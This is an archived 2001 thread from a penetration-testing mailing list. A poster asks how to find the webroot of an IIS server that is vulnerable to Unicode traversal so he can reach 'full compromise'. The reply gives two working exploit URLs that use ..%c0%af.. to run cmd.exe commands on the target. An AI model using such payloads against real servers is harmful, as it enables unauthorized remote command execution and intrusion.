Penetration Testing mailing list archives

RE: finding webroot on IIS

From: Yonatan Bokovza <Yonatan () xpert com>
Date: Thu, 14 Jun 2001 21:05:29 +0300

http://victim.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+cd
and
for further reading see:
http://victim.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set

-----Original Message-----
From: * [mailto:todd () ubermother net]
Sent: Thursday, June 14, 2001 07:30
To: pen-test () securityfocus com
Subject: finding webroot on IIS

hello all,

Recently i came across an IIS webserver that i found to be 
vulnerable to the 
Unicode attacks. However, i cannot determine the webroot of 
this drive, and 
therefore i am having troubles reaching a full comprimise.  
The directory 
"C:\Inetpub" exists, but the only contents of this directory 
is the folder 
"mailroot".

Additionally, when i connect and request the root document 
(ie GET / ), it 
returns the string: "<% Response.ContentType = "text/plain" %> HELLO"

Does anyone come across anything like this before, and what 
would be the 
simplest method of determining the webroot?

thanks in advance
todd willey
ubermother

Current thread:

RE: finding webroot on IIS, (continued)
- RE: finding webroot on IIS George Milliken (Jun 14)
- Re: finding webroot on IIS David Page (Jun 14)
  - Re: finding webroot on IIS David Jacoby (Jun 15)
- Re: finding webroot on IIS H D Moore (Jun 14)
  - Re: finding webroot on IIS todd + 1 (Jun 14)
- Re: finding webroot on IIS Frederic Guerin (Jun 15)
- Re: finding webroot on IIS Gary Warner (Jun 18)
  - 3 pigs building web servers? hacker wolf? Robert Shea (Jun 18)
    - Re: 3 pigs building web servers? hacker wolf? ghandi (Jun 19)
    - Re: 3 pigs building web servers? hacker wolf? Riley Hassell (Jun 19)
- RE: finding webroot on IIS Yonatan Bokovza (Jun 14)